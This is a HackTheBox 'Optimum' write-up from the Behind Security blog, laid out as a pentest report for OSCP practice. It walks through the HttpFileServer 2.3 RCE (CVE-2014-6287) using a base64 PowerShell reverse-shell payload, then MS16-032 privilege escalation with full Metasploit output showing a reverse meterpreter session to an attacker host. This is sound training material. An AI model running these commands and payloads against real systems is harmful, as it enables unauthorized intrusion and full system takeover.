Optimum CTF Writeup

Optimum CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Optimum CTF from HackTheBox. The writeup takes the form of a pentest report.

Optimum CTF icon

Optimum CTF

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

Introduction

This document shows the results of a security assessment performed on the Optimum machine (IP: 10.10.10.8). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.

Objective

The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.

Requirements

The assessment was conducted with the following requirements in mind:

  • Exploit vulnerabilities to demonstrate potential impact.
  • Assess the effectiveness of access controls and authentication mechanisms.
  • Demonstrate privilege escalation from user-level to root.
  • Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.

High-Level Summary

The assessment uncovered concerning vulnerabilities within the Optimum machine:

  1. CVE-2014-6287 (HttpFileServer RCE) - Severity: High
    • Explanation: Remote Code Execution (RCE) vulnerability identified in HttpFileServer version 2.3.
    • Recommendation: Update to the latest version of HttpFileServer to mitigate the risk.
  2. MS16-032 (Privilege Escalation) - Severity: Extreme
    • Explanation: Privilege escalation vulnerability discovered, allowing potential unauthorized access.
    • Recommendation: Apply the provided Microsoft patch to fix this critical vulnerability.

This high-level summary outlines the vulnerabilities found during the penetration test, along with their respective severity levels. It underscores the importance of promptly addressing and remedying these vulnerabilities to enhance overall system security.

Detailed Findings

Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in "Independent Challenge" section.

Methodology

Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Independent Challenge - 10.10.10.8

export IP=10.10.10.8

Service Enumeration

IP AddressPorts Open
10.10.10.8TCP: 80

Command: nmap -sC -sV -T4 -vv -p- 10.10.10.8

Initial Access - HttpFileServer 2.3 RCE

Vulnerability Explanation: The vulnerability was addressed as CVE-2014-6287, a remote code execution (RCE) vulnerability in HttpFileServer version 2.3.

Vulnerability Fix: The vendor released an updated version of HttpFileServer that patches the RCE vulnerability. Upgrade to the latest version to mitigate the risk.

Severity: High

Steps to Reproduce the Attack:

  1. Download this public exploit.
  2. Go to revshells.com, select PowerShell #3 (Base64), change the IP address at the top to your VPN IP address, and copy the generated payload.
  3. Run the following command to obtain a foothold on the machine (replacing the string after the -e with your respective base64 encoded payload from revshells.com): python3 49125.py 10.10.10.8 80 "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOA{abbreviated}GwAbwBzAGUAKAApAA=="
HttpFileServer 2.3 main page
Proof of Exploitation: REDACTED user.txt

Post-Exploitation

LPE to SYSTEM

Vulnerability Explanation: After generating a malicious Windows executable to establish a meterpreter session on the victim, Behind Security was able to successfully identify, by running windows exploit suggester (post/multi/recon/local_exploit_suggester), that the machine is vulnerable to ms16-032, a privilege escalation vulnerability.

Vulnerability Fix: Microsoft has issued a patch to fix this known issue. You can learn more about the patch and its details on Microsoft's official website.

Severity: Extreme

Steps to Reproduce the Attack: The attacker needs to have a meterpreter session on the machine.

  1. Background the meterpreter session using the command bg
  2. Run: use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
  3. Configuration and output are provided below.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options 

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,
                                         none)
   LHOST     192.168.1.10     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST ATTACKER-IP
LHOST => ATTACKER-IP
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on ATTACKER-IP:4444 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|

                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2380

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+         $iD6g = [Ntdll]::NtImpersonateThread($mgn, $mgn, [ref]$p8yG)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (p8yG:VariablePath) [], Runtim 
   eException
    + FullyQualifiedErrorId : NonExistingVariableReference

[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+     $iD6g = [Advapi32]::DuplicateToken($iF, 2, [ref]$gYZ)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument

[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

iX7rWHCXEXxPf38Tph4mU5nNNfoW2lnc
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (ATTACKER-IP:4444 -> 10.10.10.8:49210) at 2023-08-12 11:13:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] Already running as SYSTEM
Proof of Exploitation: REDACTED root.txt

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top